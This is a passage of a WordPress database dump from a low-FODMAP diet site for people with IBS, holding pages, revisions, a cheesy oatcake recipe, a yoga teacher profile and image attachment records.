• Food prep guide to set you up for success

\n\n\n\n

• 20 + delicious, quick and easy to follow recipes.

\n\n\n\n

• \'Next step\' guide

\n','WHAT\'S INCLUDED?','','publish','closed','closed','','whats-included','','','2020-04-05 21:34:33','2020-04-05 21:34:33','',0,'http://tummyrevolution.com/?page_id=4891',0,'page','',0),(4892,1,'2020-04-05 21:34:10','2020-04-05 21:34:10','\n
\"\"/
\n\n\n\n

Because the low-FODMAP diet is a medical diet it is always recommend that you work with a  FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. 

\n\n\n\n

I work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.

\n\n\n\n

As a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. For more information about Debra and FODMAP Consultancy visit her website  https://www.fodmapconsultancy.com

\n','Working with a Dietitian','','inherit','closed','closed','','4890-revision-v1','','','2020-04-05 21:34:10','2020-04-05 21:34:10','',4890,'http://tummyrevolution.com/4890-revision-v1/',0,'revision','',0),(4893,1,'2020-04-05 21:35:05','2020-04-05 21:35:05','\n

\n\nIf you\'ve just read about FODMAP\'s for the first time and have IBS or digestive problems you might be really excited and eager to try the low-FODMAP diet to see if it can help you.

\n\n\n\n

So where do you go from here?

\n\n\n\n

The first step could simply be to reduce FODMAPs in your diet.

\n\n\n\n

If you\'ve read about FODMAPS and realise that you\'re eating large amounts of certain FODMAP types, to start with you could reduce the intake of these. You might for example be eating large amounts of fruit or lots of wheat bread so cutting down on these may help your symptoms. Our recipes can help you get started.

\n\n\n\n

If you\'ve decided you want to go full out and try the low-FODMAP diet there are a few things to consider before starting.

\n\n\n\n

Consult your GP
First of all you want to make sure that your symptoms are not caused by any other underlying health problems and your GP can help you establish that.
Secondly, the low-FODMAP is a strict diet cutting out many food types so it is important to make sure you\'re healthy enough to go on the low-FODMAP diet. Your GP can look at your medical history, general fitness, weight and age to determine if it\'s a good idea for you to begin the diet. The FODMAP diet is still fairly new so not all GP\'s will have heard of it. You need to be prepared to explain what it is and what it involves. Your GP may choose to refer you to a dietician for further help and support.

\n\n\n\n

Consult a dietician
Most of us have never spoken to a dietician before and never before going on a diet, so why now?
One reason is that the low-FODMAP diet cuts out certain food groups and you therefore run the risk of making yourself ill and/or nutritionally deficient if you\'re not careful. A dietitian can look at your current diet, situation, medical history, weight etc and work out a low-FODMAP diet plan that is nutritious, well balanced and suitable for you.
A dietician can also help you understand and read food labels in order to avoid FODMAPs which is essential to the diet.
This is the best and recommended route to go down before starting the low-FODMAP diet. There are FODMAP trained dieticians working for the NHS and privately. Here is a list of all King\'s college London FODMAP trained dieticians in the UK. If there are not any qualified FODMAP dieticians in your area you can find that some are available online and you can contact them via email or by phone.

\n\n\n\n

I\'ve decided I want to do the low-FODMAP diet on my own without the help of a dietician.

\n\n\n\n

If you decide you want to do the low-FODMAP diet on you own i.e without consulting a dietician (not our recommendation), there are some great books covering the low-FODMAP diet. We would strongly recommend that you buy at least one or two of these books to use as a guide before and whilst on the low-FODMAP diet. Our favourite is IBS-Free at Last by Patsy Catsos MS RD LD . Patsy explains the diet in simple terms, provides an easy to follow diet plan, information on how to re-introduce FODMAP\'s back into your diet and even low-FODMAP recipes. Her diet plan is however general and not specific to your needs so you will probably need to alter/change it to suit you. Your meals need to be nutritious, contain enough vitamins, proteins and fibre for you to stay healthy.

\n\n\n\n

For more help see How to get started\n\n

\n','What to consider before going on the FODMAP diet (old SSS post)','','publish','closed','closed','','what-to-consider-before-going-on-the-fodmap-diet-old-sss-post','','','2020-04-05 21:35:06','2020-04-05 21:35:06','',0,'http://tummyrevolution.com/?page_id=4893',0,'page','',0),(4894,1,'2020-04-05 21:34:32','2020-04-05 21:34:32','\n

What\'s included in the 7-day plan?

\n\n\n\n

• Guide to prepare you for the 7 days and to help you on your journey

\n\n\n\n

• 7-day nutritious and healthy meal plan

\n\n\n\n

• Printer-friendly weekly shopping list to save you time, sanity and money

\n\n\n\n

• Food prep guide to set you up for success

\n\n\n\n

• 20 + delicious, quick and easy to follow recipes.

\n\n\n\n

• \'Next step\' guide

\n','WHAT\'S INCLUDED?','','inherit','closed','closed','','4891-revision-v1','','','2020-04-05 21:34:32','2020-04-05 21:34:32','',4891,'http://tummyrevolution.com/4891-revision-v1/',0,'revision','',0),(4895,1,'2020-04-05 21:35:22','2020-04-05 21:35:22','\n

\n\nIf you suffer with a troubled tummy (such as bloating, gas, constipation or diarrhea) this is the perfect plan for you. 

\n\n\n\n

The 7-day plan only uses foods that are good for our tummies and excludes foods that are not. 

\n\n\n\n

During the 7 days, you begin the journey to healing and nourishing your tummy through great food.

\n\n\n\n

Tummy Revolution 7 includes:

\n\n\n\n

\n\n\n\n
  • Guide to prepare you for the 7-days and to help you on your journey
  • 7-day nutritious and healthy meal plan
  •  Printer-friendly weekly shopping list to save you time, sanity and money
  • Food prep guide to set you up for success
  • 20 + delicious, quick and easy to follow recipes
  • \'Next step\' guide
\n','What is Tummy Revolution 7?','','publish','closed','closed','','what-is-tummy-revolution-7','','','2020-04-05 21:35:23','2020-04-05 21:35:23','',0,'http://tummyrevolution.com/?page_id=4895',0,'page','',0),(4896,1,'2020-04-05 21:35:05','2020-04-05 21:35:05','\n

\n\nIf you\'ve just read about FODMAP\'s for the first time and have IBS or digestive problems you might be really excited and eager to try the low-FODMAP diet to see if it can help you.

\n\n\n\n

So where do you go from here?

\n\n\n\n

The first step could simply be to reduce FODMAPs in your diet.

\n\n\n\n

If you\'ve read about FODMAPS and realise that you\'re eating large amounts of certain FODMAP types, to start with you could reduce the intake of these. You might for example be eating large amounts of fruit or lots of wheat bread so cutting down on these may help your symptoms. Our recipes can help you get started.

\n\n\n\n

If you\'ve decided you want to go full out and try the low-FODMAP diet there are a few things to consider before starting.

\n\n\n\n

Consult your GP
First of all you want to make sure that your symptoms are not caused by any other underlying health problems and your GP can help you establish that.
Secondly, the low-FODMAP is a strict diet cutting out many food types so it is important to make sure you\'re healthy enough to go on the low-FODMAP diet. Your GP can look at your medical history, general fitness, weight and age to determine if it\'s a good idea for you to begin the diet. The FODMAP diet is still fairly new so not all GP\'s will have heard of it. You need to be prepared to explain what it is and what it involves. Your GP may choose to refer you to a dietician for further help and support.

\n\n\n\n

Consult a dietician
Most of us have never spoken to a dietician before and never before going on a diet, so why now?
One reason is that the low-FODMAP diet cuts out certain food groups and you therefore run the risk of making yourself ill and/or nutritionally deficient if you\'re not careful. A dietitian can look at your current diet, situation, medical history, weight etc and work out a low-FODMAP diet plan that is nutritious, well balanced and suitable for you.
A dietician can also help you understand and read food labels in order to avoid FODMAPs which is essential to the diet.
This is the best and recommended route to go down before starting the low-FODMAP diet. There are FODMAP trained dieticians working for the NHS and privately. Here is a list of all King\'s college London FODMAP trained dieticians in the UK. If there are not any qualified FODMAP dieticians in your area you can find that some are available online and you can contact them via email or by phone.

\n\n\n\n

I\'ve decided I want to do the low-FODMAP diet on my own without the help of a dietician.

\n\n\n\n

If you decide you want to do the low-FODMAP diet on you own i.e without consulting a dietician (not our recommendation), there are some great books covering the low-FODMAP diet. We would strongly recommend that you buy at least one or two of these books to use as a guide before and whilst on the low-FODMAP diet. Our favourite is IBS-Free at Last by Patsy Catsos MS RD LD . Patsy explains the diet in simple terms, provides an easy to follow diet plan, information on how to re-introduce FODMAP\'s back into your diet and even low-FODMAP recipes. Her diet plan is however general and not specific to your needs so you will probably need to alter/change it to suit you. Your meals need to be nutritious, contain enough vitamins, proteins and fibre for you to stay healthy.

\n\n\n\n

For more help see How to get started\n\n

\n','What to consider before going on the FODMAP diet (old SSS post)','','inherit','closed','closed','','4893-revision-v1','','','2020-04-05 21:35:05','2020-04-05 21:35:05','',4893,'http://tummyrevolution.com/4893-revision-v1/',0,'revision','',0),(4897,1,'2020-04-05 21:35:22','2020-04-05 21:35:22','\n

\n\nIf you suffer with a troubled tummy (such as bloating, gas, constipation or diarrhea) this is the perfect plan for you. 

\n\n\n\n

The 7-day plan only uses foods that are good for our tummies and excludes foods that are not. 

\n\n\n\n

During the 7 days, you begin the journey to healing and nourishing your tummy through great food.

\n\n\n\n

Tummy Revolution 7 includes:

\n\n\n\n

\n\n\n\n
  • Guide to prepare you for the 7-days and to help you on your journey
  • 7-day nutritious and healthy meal plan
  •  Printer-friendly weekly shopping list to save you time, sanity and money
  • Food prep guide to set you up for success
  • 20 + delicious, quick and easy to follow recipes
  • \'Next step\' guide
\n','What is Tummy Revolution 7?','','inherit','closed','closed','','4895-revision-v1','','','2020-04-05 21:35:22','2020-04-05 21:35:22','',4895,'http://tummyrevolution.com/4895-revision-v1/',0,'revision','',0),(4898,1,'2020-04-06 21:35:00','2020-04-06 21:35:00','\n
\"\"/
\n\n\n\n

Our gut health play a much more important role to our wellbeing than many think.  When our guts are not working well, the whole body and mind is affected. 

\n\n\n\n

Doctors have been able to diagnose digestive disorders for years but have not been able to provide much in terms of a cure.  It’s only in recent years, that ground breaking research has proven that one solution, lies in the food we eat!

\n\n\n\n

Research conducted by Monash University, in Melbourne Australia, in the early 2000\'s, indicated that certain small carbohydrates in our food were connected to symptoms associated with digestive disorders, such as IBS. These carbohydrates can be divided into groups and named FODMAP’s, which is an acronym for:

\n\n\n\n

Fermentable, Oligosaccharides, Disaccharides, Monosaccharides and Polyols.
It might sound complicated but they are simply fermentable carbohydrates found naturally in the foods we eat.

\n\n\n\n

These carbohydrates (FODMAPs) are not absorbed properly in the small intestine. So when they reach the large intestine the billions of bacteria that naturally line the gut start fermenting the FODMAPs. All of this is perfectly natural and most people don’t have trouble with the amounts of FODMAPs encountered in a typical diet. However, people with a sensitive or damaged gut seem to have a lower tolerance for some of these FODMAPs and the fermentation process results in excessive gas production which causes the familiar symptoms of wind, bloating and discomfort. Also, an osmotic effect occurs where the large intestine either looses or retains too much water. This can cause the symptoms of loose stools or diarrhoea and in other sufferers, constipation. When you increase your intake of FODMAPs your symptoms will also increase.

\n\n\n\n
\"\"/
\n\n\n\n

The research showed that individuals with IBS felt better when they minimised FODMAP’s in their diet; as a result, the low-FODMAP diet was developed.  The low FODMAP diet is not only limited to IBS sufferers.  It has also been shown to improve gut symptoms in people with gluten sensitivity, intestinal inflammation and inflammatory bowel disease. It is now recognised, worldwide, as the number one treatment for IBS and related gastric problems.

\n\n\n\n

The good news is that the low-FODMAP diet is a temporary diet and not a diet for life. It is a method of finding out what triggers your digestive problems so that you can alter and customise your diet according to your own needs. The likelihood is that only a few FODMAPs cause you problems, rather than all.

\n','What is the low FODMAP diet?','','publish','closed','closed','','what-is-the-fodmap-diet','','','2020-04-23 08:55:09','2020-04-23 08:55:09','',0,'http://tummyrevolution.com/?page_id=4898',0,'page','',0),(4899,1,'2020-04-05 21:36:55','2020-04-05 21:36:55','
\r\n\r\n\"\"We are really proud to work with yoga teacher, Kerry Morgan. She\'s an incredibly talented, ambitious and kind person that brings us real inspiration. We are currently working on a number of \'tummy friendly\' sequences with Kerry, to relieve stress and aid relaxation that will be available later this year.\r\n\r\nKerry teaches with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul. Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment, stemming from her desire to use yoga as a tool to heal and strengthen the body and mind.  Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.  You can find out more about Kerry and the yoga she teaches here.\r\n\r\n
\r\n
\r\n
You must also check out Kerry\'s beach yoga video.  It really makes us what to pick up our yoga mats and head for the beach!
\r\n
\r\n\r\n\r\n\r\nYoga with Kerry - Beach Yoga from Kerry on Vimeo.\r\n\r\n
\r\n
','Yoga with Kerry Morgan','','publish','closed','closed','','yoga-with-kerry-morgan','','','2020-04-05 21:39:23','2020-04-05 21:39:23','',0,'http://tummyrevolution.com/?page_id=4899',0,'page','',0),(4900,1,'2020-04-05 21:35:56','2020-04-05 21:35:56','\n
\"\"/
\n\n\n\n

Our gut health play a much more important role to our wellbeing than many think.  When our guts are not working well, the whole body and mind is affected. 

\n\n\n\n

Doctors have been able to diagnose digestive disorders for years but have not been able to provide much in terms of a cure.  It’s only in recent years, that ground breaking research has proven that one solution, lies in the food we eat!

\n\n\n\n

Research conducted by Monash University, in Melbourne Australia, in the early 2000\'s, indicated that certain small carbohydrates in our food were connected to symptoms associated with digestive disorders, such as IBS. These carbohydrates can be divided into groups and named FODMAP’s, which is an acronym for:

\n\n\n\n

Fermentable, Oligosaccharides, Disaccharides, Monosaccharides and Polyols.
It might sound complicated but they are simply fermentable carbohydrates found naturally in the foods we eat.

\n\n\n\n

These carbohydrates (FODMAPs) are not absorbed properly in the small intestine. So when they reach the large intestine the billions of bacteria that naturally line the gut start fermenting the FODMAPs. All of this is perfectly natural and most people don’t have trouble with the amounts of FODMAPs encountered in a typical diet. However, people with a sensitive or damaged gut seem to have a lower tolerance for some of these FODMAPs and the fermentation process results in excessive gas production which causes the familiar symptoms of wind, bloating and discomfort. Also, an osmotic effect occurs where the large intestine either looses or retains too much water. This can cause the symptoms of loose stools or diarrhoea and in other sufferers, constipation. When you increase your intake of FODMAPs your symptoms will also increase.

\n\n\n\n
\"\"/
\n\n\n\n

The research showed that individuals with IBS felt better when they minimised FODMAP’s in their diet; as a result, the low-FODMAP diet was developed.  The low FODMAP diet is not only limited to IBS sufferers.  It has also been shown to improve gut symptoms in people with gluten sensitivity, intestinal inflammation and inflammatory bowel disease. It is now recognised, worldwide, as the number one treatment for IBS and related gastric problems.

\n\n\n\n

The good news is that the low-FODMAP diet is a temporary diet and not a diet for life. It is a method of finding out what triggers your digestive problems so that you can alter and customise your diet according to your own needs. The likelihood is that only a few FODMAPs cause you problems, rather than all.

\n','What is the FODMAP diet?','','inherit','closed','closed','','4898-revision-v1','','','2020-04-05 21:35:56','2020-04-05 21:35:56','',4898,'http://tummyrevolution.com/4898-revision-v1/',0,'revision','',0),(4901,1,'2020-04-05 21:36:55','2020-04-05 21:36:55','\n
\"\"/
\n

We are really proud to work with yoga teacher, Kerry Morgan. She\'s an incredibly talented, ambitious and kind person that brings us real inspiration. We are currently working on a number of \'tummy friendly\' sequences with Kerry, to relieve stress and aid relaxation that will be available later this year.

\n
\n\n\n\n

We are really proud to work with yoga teacher, Kerry Morgan. She\'s an incredibly talented, ambitious and kind person that brings us real inspiration. We are currently working on a number of \'tummy friendly\' sequences with Kerry, to relieve stress and aid relaxation that will be available later this year.

\n\n\n\n

Kerry teaches with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul. Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment, stemming from her desire to use yoga as a tool to heal and strengthen the body and mind.  Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.  You can find out more about Kerry and the yoga she teaches here
You must also check out Kerry\'s beach yoga video.  It really makes us what to pick up our yoga mats and head for the beach!

\n\n\n\n
\n\n\n\n

Yoga with Kerry - Beach Yoga from Kerry on Vimeo.

\n','Yoga with Kerry Morgan','','inherit','closed','closed','','4899-revision-v1','','','2020-04-05 21:36:55','2020-04-05 21:36:55','',4899,'http://tummyrevolution.com/4899-revision-v1/',0,'revision','',0),(4902,1,'2020-04-05 21:38:18','2020-04-05 21:38:18','
\"\"We are really proud to work with yoga teacher, Kerry Morgan. She\'s an incredibly talented, ambitious and kind person that brings us real inspiration. We are currently working on a number of \'tummy friendly\' sequences with Kerry, to relieve stress and aid relaxation that will be available later this year.

Kerry teaches with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul. Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment, stemming from her desire to use yoga as a tool to heal and strengthen the body and mind.  Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.  You can find out more about Kerry and the yoga she teaches here
\r\n
\r\n

You must also check out Kerry\'s beach yoga video.  It really makes us what to pick up our yoga mats and head for the beach!
\r\n\r\n
','Yoga with Kerry Morgan','','inherit','closed','closed','','4899-revision-v1','','','2020-04-05 21:38:18','2020-04-05 21:38:18','',4899,'http://tummyrevolution.com/4899-revision-v1/',0,'revision','',0),(4903,1,'2020-04-05 21:39:23','2020-04-05 21:39:23','
\r\n\r\n\"\"We are really proud to work with yoga teacher, Kerry Morgan. She\'s an incredibly talented, ambitious and kind person that brings us real inspiration. We are currently working on a number of \'tummy friendly\' sequences with Kerry, to relieve stress and aid relaxation that will be available later this year.\r\n\r\nKerry teaches with compassion and always from the heart. Her playful and light hearted approach helps guide her students to observe their mind and understand their bodies in a way that unites the body, mind and soul. Kerry believes in working hard yet mindfully, allowing ourselves to explore new challenges with a principle of acceptance and kindness towards ourself. She maintains focus on core integration and alignment, stemming from her desire to use yoga as a tool to heal and strengthen the body and mind.  Yoga with Kerry gives you the time and space to connect more deeply with yourself and your practice.  You can find out more about Kerry and the yoga she teaches here.\r\n\r\n
\r\n
\r\n
You must also check out Kerry\'s beach yoga video.  It really makes us what to pick up our yoga mats and head for the beach!
\r\n
\r\n\r\n\r\n\r\nYoga with Kerry - Beach Yoga from Kerry on Vimeo.\r\n\r\n
\r\n
','Yoga with Kerry Morgan','','inherit','closed','closed','','4899-revision-v1','','','2020-04-05 21:39:23','2020-04-05 21:39:23','',4899,'http://tummyrevolution.com/4899-revision-v1/',0,'revision','',0),(4904,1,'2020-04-06 01:30:07','2020-04-06 01:30:07','','ezgif.com-webp-to-jpg','','inherit','open','closed','','ezgif-com-webp-to-jpg','','','2020-04-06 01:30:07','2020-04-06 01:30:07','',4652,'http://tummyrevolution.com/wp-content/uploads/2020/04/ezgif.com-webp-to-jpg.jpg',0,'attachment','image/jpeg',0),(4905,1,'2020-04-06 01:32:54','2020-04-06 01:32:54','','ezgif.com-webp-to-jpg (1)','','inherit','open','closed','','ezgif-com-webp-to-jpg-1','','','2020-04-06 01:32:54','2020-04-06 01:32:54','',4662,'http://tummyrevolution.com/wp-content/uploads/2020/04/ezgif.com-webp-to-jpg-1.jpg',0,'attachment','image/jpeg',0),(4906,1,'2020-04-06 01:33:53','2020-04-06 01:33:53','','IMG_4580_880x','','inherit','open','closed','','img_4580_880x','','','2020-04-06 01:33:53','2020-04-06 01:33:53','',4664,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_4580_880x.jpg',0,'attachment','image/jpeg',0),(4907,1,'2020-04-06 01:34:50','2020-04-06 01:34:50','','Banana_Bread_edited_880x (1)','','inherit','open','closed','','banana_bread_edited_880x-1','','','2020-04-06 01:34:50','2020-04-06 01:34:50','',4666,'http://tummyrevolution.com/wp-content/uploads/2020/04/Banana_Bread_edited_880x-1.jpg',0,'attachment','image/jpeg',0),(4908,1,'2020-04-06 01:35:02','2020-04-06 01:35:02','','meatballssquareweb_880x','','inherit','open','closed','','meatballssquareweb_880x','','','2020-04-06 01:35:02','2020-04-06 01:35:02','',4666,'http://tummyrevolution.com/wp-content/uploads/2020/04/meatballssquareweb_880x.jpg',0,'attachment','image/jpeg',0),(4909,1,'2020-04-06 01:36:25','2020-04-06 01:36:25','','ezgif.com-webp-to-jpg (2)','','inherit','open','closed','','ezgif-com-webp-to-jpg-2','','','2020-04-06 01:36:25','2020-04-06 01:36:25','',4668,'http://tummyrevolution.com/wp-content/uploads/2020/04/ezgif.com-webp-to-jpg-2.jpg',0,'attachment','image/jpeg',0),(4910,1,'2020-04-06 01:37:30','2020-04-06 01:37:30','','ezgif.com-webp-to-jpg (3)','','inherit','open','closed','','ezgif-com-webp-to-jpg-3','','','2020-04-06 01:37:30','2020-04-06 01:37:30','',4670,'http://tummyrevolution.com/wp-content/uploads/2020/04/ezgif.com-webp-to-jpg-3.jpg',0,'attachment','image/jpeg',0),(4911,1,'2020-04-06 01:49:53','2020-04-06 01:49:53','','1','','inherit','open','closed','','1','','','2020-04-06 01:49:53','2020-04-06 01:49:53','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/1.jpg',0,'attachment','image/jpeg',0),(4912,1,'2020-04-06 01:49:56','2020-04-06 01:49:56','','2','','inherit','open','closed','','2-2','','','2020-04-06 01:49:56','2020-04-06 01:49:56','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/2-1.jpg',0,'attachment','image/jpeg',0),(4913,1,'2020-04-06 01:49:58','2020-04-06 01:49:58','','3','','inherit','open','closed','','3','','','2020-04-06 01:49:58','2020-04-06 01:49:58','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/3.jpg',0,'attachment','image/jpeg',0),(4914,1,'2020-04-06 01:50:01','2020-04-06 01:50:01','','4','','inherit','open','closed','','4','','','2020-04-06 01:50:01','2020-04-06 01:50:01','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/4.jpg',0,'attachment','image/jpeg',0),(4915,1,'2020-04-06 01:50:03','2020-04-06 01:50:03','','5','','inherit','open','closed','','5','','','2020-04-06 01:50:03','2020-04-06 01:50:03','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/5.jpg',0,'attachment','image/jpeg',0),(4916,1,'2020-04-06 01:50:05','2020-04-06 01:50:05','','6','','inherit','open','closed','','6','','','2020-04-06 01:50:05','2020-04-06 01:50:05','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/6.jpg',0,'attachment','image/jpeg',0),(4917,1,'2020-04-06 01:50:08','2020-04-06 01:50:08','','7','','inherit','open','closed','','7','','','2020-04-06 01:50:08','2020-04-06 01:50:08','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/7.jpg',0,'attachment','image/jpeg',0),(4918,1,'2020-04-06 01:55:26','2020-04-06 01:55:26','\n

\n\nOatcakes is one of my favourite snacks and I have it almost daily. Oatcakes are a great way of topping up your daily fibre intake, which you need to watch if you\'re for example are on the low FODMAP diet. Oats are also a naturally gluten-free whole grain and a great source of important vitamins, minerals, and antioxidants. Oatcakes are great with almost anything. You can have it with cheese and some veg such as pepper or tomato, with soup, salad or with some fruit such as grapes. It\'s also great to have on the go or as an emergency snack in your bag. I am out and about a lot and oatcakes are great to have at hand if I need something quickly to get me by.

\n\n\n\n
\"\"/
\n\n\n\n

I\'ve always bought my oatcakes so I was so happy to come across this recipe on Instagram and to learn how easy it was to make them myself. The original recipe is by Antonia at www.fodmapfriendlyeating.wordpress.com. She has got some lovely FODMAP friendly recipes on her blog so go check her out for some inspiration.  I changed the recipe slightly, which is why I\'ve added it below. I used a bit less oats as I didn\'t use a food processor. I have also added rosemary which is a herb I really like in my oatcakes. For variety you can try other spices too such as cayenne pepper, oregano, thyme, pepper or turmeric.
They were so easy to make and with only a few ingredients. I would really recommend trying them out. They are so great in every way.
 INGREDIENTS

\n\n\n\n
  • 300 ml / 1.5 cups oats
  • 1/2 sea salt
  • 1 egg 
  • 1 cup grated cheese (choose any hard cheese such as cheddar)
  • 1 tsp dried or fresh rosemary 
  • 1-2 tbsp lactose free milk, almond milk or water
\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Preheat the oven to 190° C (350°F)
  2. Whisk the egg a little in a bowl, then add to the oats and mix.
  3. Add the salt and rosemary (you can also add other spices and herbs such as turmeric, cayenne pepper, oregano, pepper if you want to experiment with flavours)
  4. Then add the milk or water until you feel the mixture just comes together.
  5. Divide the mixture into 6-8 balls and then add them to a lined baking tray.
  6. Press the balls down and shape into round shapes. They don\'t need to be perfect though. If the dough get\'s sticky and difficult to shape, rinse your hands in water and leave them wet as a little bit of moisture will help.
  7. Bake for about 15-20 minutes or until slightly golden brown around the edges.
  8. Allow to cool, then store in a tin.
\n','Cheesy Oatcakes with Rosemary','','inherit','closed','closed','','4682-revision-v1','','','2020-04-06 01:55:26','2020-04-06 01:55:26','',4682,'http://tummyrevolution.com/4682-revision-v1/',0,'revision','',0),(4921,1,'2020-04-09 11:41:43','2020-04-09 11:41:43','','Logo-New-TR-web-2','','inherit','open','closed','','logo-new-tr-web-2-2','','','2020-04-09 11:42:10','2020-04-09 11:42:10','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Logo-New-TR-web-2.jpg',0,'attachment','image/jpeg',0),(4922,1,'2020-04-06 09:12:03','2020-04-06 09:12:03','','logo little heart','','inherit','open','closed','','logo-little-heart','','','2020-04-06 09:12:03','2020-04-06 09:12:03','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/logo-little-heart.png',0,'attachment','image/png',0),(4923,1,'2020-04-06 09:17:10','2020-04-06 09:17:10','','logo little heart','','inherit','open','closed','','logo-little-heart-2','','','2020-04-06 09:17:10','2020-04-06 09:17:10','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/logo-little-heart-1.png',0,'attachment','image/png',0),(4924,1,'2020-04-06 11:55:11','2020-04-06 11:55:11','','Long orange banan','','inherit','open','closed','','long-orange-banan','','','2020-04-06 11:55:11','2020-04-06 11:55:11','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Long-orange-banan.jpg',0,'attachment','image/jpeg',0),(4925,1,'2020-04-06 11:55:15','2020-04-06 11:55:15','','Long orange banan','','inherit','open','closed','','long-orange-banan-2','','','2020-04-06 11:55:15','2020-04-06 11:55:15','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Long-orange-banan-1.jpg',0,'attachment','image/jpeg',0),(4926,1,'2020-04-06 11:59:27','2020-04-06 11:59:27','','IMG_0003','','inherit','open','closed','','img_0003','','','2020-04-06 11:59:27','2020-04-06 11:59:27','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0003.jpg',0,'attachment','image/jpeg',0),(4927,1,'2020-04-06 11:59:42','2020-04-06 11:59:42','','IMG_0005','','inherit','open','closed','','img_0005','','','2020-04-06 11:59:42','2020-04-06 11:59:42','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0005.jpg',0,'attachment','image/jpeg',0),(4928,1,'2020-04-06 11:59:52','2020-04-06 11:59:52','','IMG_0006','','inherit','open','closed','','img_0006','','','2020-04-06 11:59:52','2020-04-06 11:59:52','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0006.jpg',0,'attachment','image/jpeg',0),(4929,1,'2020-04-06 11:59:56','2020-04-06 11:59:56','','IMG_0007','','inherit','open','closed','','img_0007','','','2020-04-06 11:59:56','2020-04-06 11:59:56','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0007.jpg',0,'attachment','image/jpeg',0),(4930,1,'2020-04-06 12:00:00','2020-04-06 12:00:00','','IMG_0008','','inherit','open','closed','','img_0008','','','2020-04-06 12:00:00','2020-04-06 12:00:00','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0008.jpg',0,'attachment','image/jpeg',0),(4931,1,'2020-04-06 12:00:05','2020-04-06 12:00:05','','IMG_0009','','inherit','open','closed','','img_0009','','','2020-04-06 12:00:05','2020-04-06 12:00:05','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0009.jpg',0,'attachment','image/jpeg',0),(4932,1,'2020-04-06 12:00:12','2020-04-06 12:00:12','','IMG_0011','','inherit','open','closed','','img_0011','','','2020-04-06 12:00:12','2020-04-06 12:00:12','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0011.jpg',0,'attachment','image/jpeg',0),(4933,1,'2020-04-06 12:00:20','2020-04-06 12:00:20','','IMG_0012','','inherit','open','closed','','img_0012','','','2020-04-06 12:00:20','2020-04-06 12:00:20','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0012.jpg',0,'attachment','image/jpeg',0),(4934,1,'2020-04-06 12:00:31','2020-04-06 12:00:31','','IMG_0016','','inherit','open','closed','','img_0016','','','2020-04-06 12:00:31','2020-04-06 12:00:31','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0016.jpg',0,'attachment','image/jpeg',0),(4935,1,'2020-04-06 12:00:39','2020-04-06 12:00:39','','IMG_0017','','inherit','open','closed','','img_0017','','','2020-04-06 12:00:39','2020-04-06 12:00:39','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0017.jpg',0,'attachment','image/jpeg',0),(4936,1,'2020-04-06 12:00:46','2020-04-06 12:00:46','','IMG_0018','','inherit','open','closed','','img_0018','','','2020-04-06 12:00:46','2020-04-06 12:00:46','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0018.jpg',0,'attachment','image/jpeg',0),(4937,1,'2020-04-06 12:00:54','2020-04-06 12:00:54','','IMG_0019','','inherit','open','closed','','img_0019','','','2020-04-06 12:00:54','2020-04-06 12:00:54','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0019.jpg',0,'attachment','image/jpeg',0),(4938,1,'2020-04-06 12:01:02','2020-04-06 12:01:02','','IMG_0020','','inherit','open','closed','','img_0020','','','2020-04-06 12:01:02','2020-04-06 12:01:02','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0020.jpg',0,'attachment','image/jpeg',0),(4939,1,'2020-04-06 12:01:09','2020-04-06 12:01:09','','IMG_0022','','inherit','open','closed','','img_0022','','','2020-04-06 12:01:09','2020-04-06 12:01:09','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/IMG_0022.jpg',0,'attachment','image/jpeg',0),(4940,1,'2020-04-06 12:01:14','2020-04-06 12:01:14','','IMG_0023','','inherit','open','closed','','img_0023','','','2020-04-06 12:01:14','2020-04-06 